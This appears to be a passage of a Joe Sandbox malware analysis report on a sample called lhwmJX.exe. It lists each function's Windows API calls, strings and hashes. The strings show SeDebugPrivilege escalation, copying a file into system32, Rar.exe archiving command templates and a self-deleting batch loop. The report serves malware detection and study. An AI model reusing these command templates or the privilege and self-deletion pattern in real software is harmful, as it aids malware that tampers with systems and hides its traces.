VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC61A5

Memory Dump Source

Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 0cff6caa181df417e9e241f4614f495df2db0bb44e5a30207211a4435459ba00
Instruction ID: eaba7a30525f325900465ff59cbf61d93348ba2aef3b8fa70f1409ea1c4725cc
Opcode Fuzzy Hash: 0cff6caa181df417e9e241f4614f495df2db0bb44e5a30207211a4435459ba00
Instruction Fuzzy Hash: 26213432A006498FCB318F58CC81BED37E2EF45301F69046DDE8AAF291DA716A50CB94

Non-executed Functions

Function 00BC119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,?,?,00BC13EF), ref: 00BC11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00BC13EF,?,?,?,?,?,?,00BC13EF), ref: 00BC11BB
AdjustTokenPrivileges.ADVAPI32(00BC13EF,00000000,?,00000010,00000000,00000000), ref: 00BC11EB
CloseHandle.KERNEL32(00BC13EF), ref: 00BC11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BC13EF), ref: 00BC1203

Strings

C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC11A5

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe
API String ID: 75692138-3390243486
Opcode ID: 5f201dff3b033448ff8304073a4bdc56b608e87eaa50592b91730404209a99e2
Instruction ID: 66088fc2d43abe2a838e20ab6b6a14ab430b3a40a848c406c3bc85c261736e55
Opcode Fuzzy Hash: 5f201dff3b033448ff8304073a4bdc56b608e87eaa50592b91730404209a99e2
Instruction Fuzzy Hash: AB01E876900209EFDB00DFD4CD89EAEBBF8FB08705F508469E605A2151DB719F449B50

Function 00BC139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00BC13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00BC1448

Part of subcall function 00BC119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,?,?,00BC13EF), ref: 00BC11AB
Part of subcall function 00BC119F: OpenProcessToken.ADVAPI32(00000000,00000028,00BC13EF,?,?,?,?,?,?,00BC13EF), ref: 00BC11BB
Part of subcall function 00BC119F: AdjustTokenPrivileges.ADVAPI32(00BC13EF,00000000,?,00000010,00000000,00000000), ref: 00BC11EB
Part of subcall function 00BC119F: CloseHandle.KERNEL32(00BC13EF), ref: 00BC11FA
Part of subcall function 00BC119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00BC13EF), ref: 00BC1203

Strings

C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC13A8
SeDebugPrivilege, xrefs: 00BC13D3

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$SeDebugPrivilege
API String ID: 4123949106-4209104298
Opcode ID: f696beb62abceefa5fee85aefb455b96f5dc3728a8c7cd0a31d753d2176a88d5
Instruction ID: 98a6daf9b84402f5d0690927e27eaff0e91e15c33d289fe7c479687f40b53cba
Opcode Fuzzy Hash: f696beb62abceefa5fee85aefb455b96f5dc3728a8c7cd0a31d753d2176a88d5
Instruction Fuzzy Hash: 4D313271D00249AAEF20EBA9CC45FEEBBF8EB86704F2045ADE504B2242D6705E45CF60

Function 00BC239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00BC23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00BC2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00BC24A8
memset.MSVCRT ref: 00BC24B9
strrchr.MSVCRT ref: 00BC24C9
wsprintfA.USER32 ref: 00BC24DE
strrchr.MSVCRT ref: 00BC24ED
memset.MSVCRT ref: 00BC24F2
memset.MSVCRT ref: 00BC2505
wsprintfA.USER32 ref: 00BC2524
Sleep.KERNEL32(000007D0), ref: 00BC2535
Sleep.KERNEL32(000007D0), ref: 00BC255D
memset.MSVCRT ref: 00BC256E
wsprintfA.USER32 ref: 00BC2585
memset.MSVCRT ref: 00BC25A6
wsprintfA.USER32 ref: 00BC25CA
Sleep.KERNEL32(000007D0), ref: 00BC25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00BC25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00BC25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00BC2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00BC2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00BC265B
SetEndOfFile.KERNEL32 ref: 00BC266D
CloseHandle.KERNEL32(00000000), ref: 00BC2676
RemoveDirectoryA.KERNEL32(?), ref: 00BC2681

Strings

%s X -ibck "%s" "%s\", xrefs: 00BC251E
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC23B1, 00BC23B6, 00BC24CD
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00BC25C4
-ibck, xrefs: 00BC25BA
%s%s, xrefs: 00BC24D8
%s\, xrefs: 00BC257F

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
API String ID: 2203340711-1252250577
Opcode ID: 9fafb57300d6bacd4246058b5d953c860be1764004c43eac57b788c013d11712
Instruction ID: 78b74dbc29a45af8dd3a49df406be2e0f1d8b91cb82baccbae3c827826cf8442
Opcode Fuzzy Hash: 9fafb57300d6bacd4246058b5d953c860be1764004c43eac57b788c013d11712
Instruction Fuzzy Hash: 878171B2504344ABD7109F64DC85FABB7ECFB88B04F40496EFA44D31A0DB74DA498B66

Function 00BC274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00BC2766
memset.MSVCRT ref: 00BC2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00BC2787
wsprintfA.USER32 ref: 00BC27AB

Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894

wsprintfA.USER32 ref: 00BC27C6
CopyFileA.KERNEL32(?,00BC4C80,00000000), ref: 00BC27D4
wsprintfA.USER32 ref: 00BC27F4

Part of subcall function 00BC1973: PathFileExistsA.SHLWAPI(00BC4E5C,00000000,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1992
Part of subcall function 00BC1973: CreateFileA.KERNEL32(00BC4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00BC19BA
Part of subcall function 00BC1973: Sleep.KERNEL32(00000064), ref: 00BC19C6
Part of subcall function 00BC1973: wsprintfA.USER32 ref: 00BC19EC
Part of subcall function 00BC1973: CopyFileA.KERNEL32(00BC4E5C,?,00000000), ref: 00BC1A00
Part of subcall function 00BC1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BC1A1E
Part of subcall function 00BC1973: GetFileSize.KERNEL32(00BC4E5C,00000000), ref: 00BC1A2C
Part of subcall function 00BC1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00BC1A46
Part of subcall function 00BC1973: ReadFile.KERNEL32(00BC4E5C,00BC4E60,00000000,?,00000000), ref: 00BC1A65

DeleteFileA.KERNEL32(?,?,00BC4E54,00BC4E58), ref: 00BC281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00BC4E54,00BC4E58), ref: 00BC2832

Strings

\WinRAR\Rar.exe, xrefs: 00BC2793
c_31892.nls, xrefs: 00BC27DE
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC27B6
C:\Windows\system32, xrefs: 00BC27E3
%s\%s, xrefs: 00BC27EE
%s%.8x.exe, xrefs: 00BC27BB
%s%s, xrefs: 00BC27A5

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-4282063453
Opcode ID: e3d531e9be2bb940b622898474c7b4c7f797460bf856c4c00e466e71a67eb09d
Instruction ID: ef8b759be4250e116def5363fca34fd445afe4174d85d1acf8054e59736e87d4
Opcode Fuzzy Hash: e3d531e9be2bb940b622898474c7b4c7f797460bf856c4c00e466e71a67eb09d
Instruction Fuzzy Hash: 252142B694021C7BEB10E7A49C99FDB77ECEB04B44F4045E9B654E3052EA70DF448AB0

Function 00BC1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894

wsprintfA.USER32 ref: 00BC15AA
wsprintfA.USER32 ref: 00BC15C6
lstrlen.KERNEL32(?), ref: 00BC15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00BC15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00BC1609
CloseHandle.KERNEL32(00000000), ref: 00BC1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00BC162D

Strings

C:\Users\user~1\AppData\Local\Temp\, xrefs: 00BC1599
%s%.8x.bat, xrefs: 00BC15A4
C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC158A, 00BC15B3, 00BC15B8, 00BC15B9
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00BC15C0
open, xrefs: 00BC1627

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$open
API String ID: 617340118-1643546310
Opcode ID: 0e60571d9b554ac6b4ea2fde659e669f10d8ae46aa2ff9bf28ac698c994a6804
Instruction ID: e585f8f3f90758a9fb058f92889c120060b5ce6064f0b0c0c4dd11d5a841738b
Opcode Fuzzy Hash: 0e60571d9b554ac6b4ea2fde659e669f10d8ae46aa2ff9bf28ac698c994a6804
Instruction Fuzzy Hash: 25118F72A011287ED72097A59C89EEB7AECEF09B10F4440A5F549F3051EA709B848AA0

Function 00BC120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00BC1400), ref: 00BC1226
GetProcAddress.KERNEL32(00000000), ref: 00BC122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00BC1400), ref: 00BC123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00BC1400), ref: 00BC1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC12B0
CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe,?,?,?,?,00BC1400), ref: 00BC12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00BC1400), ref: 00BC130A

Strings

ntdll.dll, xrefs: 00BC1219
C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe, xrefs: 00BC1262
ZwQuerySystemInformation, xrefs: 00BC1212

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-2268455143
Opcode ID: 4f5cab964eca6629ea2ea4bd6efb3f3a5b3e9077dfa8659ccfca094fdd612b44
Instruction ID: 0dcfd3c73284cb0987904d514eec142bcc180d939329b255cda5f8ee5b656517
Opcode Fuzzy Hash: 4f5cab964eca6629ea2ea4bd6efb3f3a5b3e9077dfa8659ccfca094fdd612b44
Instruction Fuzzy Hash: 5D21E371605311ABD7209B69CC08F6BBAE8FB8AF00F504D5CFA45EB241C770DA44C7A5

Function 00BC2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00BC29DB,?,00000001), ref: 00BC26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00BC29DB,?,00000001), ref: 00BC26B5
lstrlen.KERNEL32(?), ref: 00BC26C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00BC26CE
lstrcpy.KERNEL32(00000004,?), ref: 00BC26E3
lstrcpy.KERNEL32(?,00000004), ref: 00BC271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00BC272D
SetEvent.KERNEL32 ref: 00BC273C

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: 4988a5fca8eaafaae0e84315bf62799ee32ae2802bf1d18e0ad5b45b71816a56
Instruction ID: e852ccf20ac1daec8d558f70302b2558d91e0516d0a5bc6abf380496e83727e5
Opcode Fuzzy Hash: 4988a5fca8eaafaae0e84315bf62799ee32ae2802bf1d18e0ad5b45b71816a56
Instruction Fuzzy Hash: 2111BF36600200EFCB21AF54EC88E5A7BE9FB88B21751806AF859C7120DF308E85DB60

Function 00BC1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00BC1BCD
rand.MSVCRT ref: 00BC1BD8
memset.MSVCRT ref: 00BC1C43
memcpy.MSVCRT(?,lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00BC1C4F
lstrcat.KERNEL32(?,.exe), ref: 00BC1C5D

Strings

lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM, xrefs: 00BC1B8A, 00BC1B9C, 00BC1C15, 00BC1C49
.exe, xrefs: 00BC1C57

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$lWQvLqwiuPDPTczYwHOSsIqLnUoEGSHKsAjbDranrWJUfWdPmAlvjisRnopqdKNarDTVmiuBQhzFzXBeJGROoeRJFxSHQAjkCYMCfcLOtGNhYfUbpZXygtvxNIubxeXZkgdwgtBaEhKyTmVIlMCEFVcZypkM
API String ID: 122620767-1133619743
Opcode ID: bad173319a9fceffd067686bc17abaf0d170360d57379de77802eb79648d33cd
Instruction ID: b2442848df310df894f988a2b335175be5794a0b9aabecdb4f7b0ae3ec467ff7
Opcode Fuzzy Hash: bad173319a9fceffd067686bc17abaf0d170360d57379de77802eb79648d33cd
Instruction Fuzzy Hash: 45213E23F441906ED315233D6C60FAA2BC4DFABB11F1644EDF5866B1A3D6540EC68260

Function 00BC189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00BC18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00BC18D3
CloseHandle.KERNEL32(00BC2549), ref: 00BC18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00BC18F0
GetExitCodeProcess.KERNEL32(?,00BC2549), ref: 00BC1901
CloseHandle.KERNEL32(?), ref: 00BC190A

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: d5cc2eff924708bcc592cd4d6f2daaefd7020b44119d7bb10f21693a580c26da
Instruction ID: 1f08a3bc574f7c4e0f8c0b4cb9ed203b16168138499dcfce7bfdca22a3a5ef02
Opcode Fuzzy Hash: d5cc2eff924708bcc592cd4d6f2daaefd7020b44119d7bb10f21693a580c26da
Instruction Fuzzy Hash: 6A018472901128BBCB216BD5DC48EDF7FBDFF89730F104025F915A61A0D6754A18CBA0

Function 00BC1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00BC1334
GetProcAddress.KERNEL32(00000000), ref: 00BC133B
memset.MSVCRT ref: 00BC1359

Strings

NtSystemDebugControl, xrefs: 00BC132A
ntdll.dll, xrefs: 00BC132F

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: b734c5bbf73e8fd42144fa6b7fa5ac598fc8962aaf0fefaaaac1eec51927a167
Instruction ID: b175c9fc9ff9ee221fd62c8cc93783bc241fcd7799cde4e13531d162ad20e07f
Opcode Fuzzy Hash: b734c5bbf73e8fd42144fa6b7fa5ac598fc8962aaf0fefaaaac1eec51927a167
Instruction Fuzzy Hash: 67018B71600249BFDB109F98AC84EAFBBF8FB86708F0045AEF901B2151E7B086048A55

Function 00BC1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00BC1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00BC1E1C
strrchr.MSVCRT ref: 00BC1E2B
lstrcmpiA.KERNEL32(?,00BC4488), ref: 00BC1E48
lstrlen.KERNEL32(00BC4488), ref: 00BC1E53

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 4750f5e442673d036f6cbba10b842f5485dfe24a144196f58e75f9e2221de1a0
Instruction ID: 2ab816e98bf363ce253d95629175eb09ca5fa19f01d9f49b5f73b39d8baf10a9
Opcode Fuzzy Hash: 4750f5e442673d036f6cbba10b842f5485dfe24a144196f58e75f9e2221de1a0
Instruction Fuzzy Hash: D901F9B390421A6FEB205764EC48FD677DCEB09310F5444AAEA45F3091EF74DA848BA0

Function 00BC185B Relevance: 7.5, APIs: 5, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
srand.MSVCRT ref: 00BC1878
rand.MSVCRT ref: 00BC1880
srand.MSVCRT ref: 00BC1890
rand.MSVCRT ref: 00BC1894

Memory Dump Source

Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID:
API String ID: 4106363736-0
Opcode ID: f2e5fd7b2155096420c92255057f57f92c3169e1b737aa732a2bb8008ee7fa9f
Instruction ID: da5ebc2357144560b2f1f851d9ad519ba203d901e79c07092486b21c3dad5261
Opcode Fuzzy Hash: f2e5fd7b2155096420c92255057f57f92c3169e1b737aa732a2bb8008ee7fa9f
Instruction Fuzzy Hash: F7E0D877A00218BBD700A7F9EC46D9EBBECEE88561B100527F600D3250E971FD448AB4

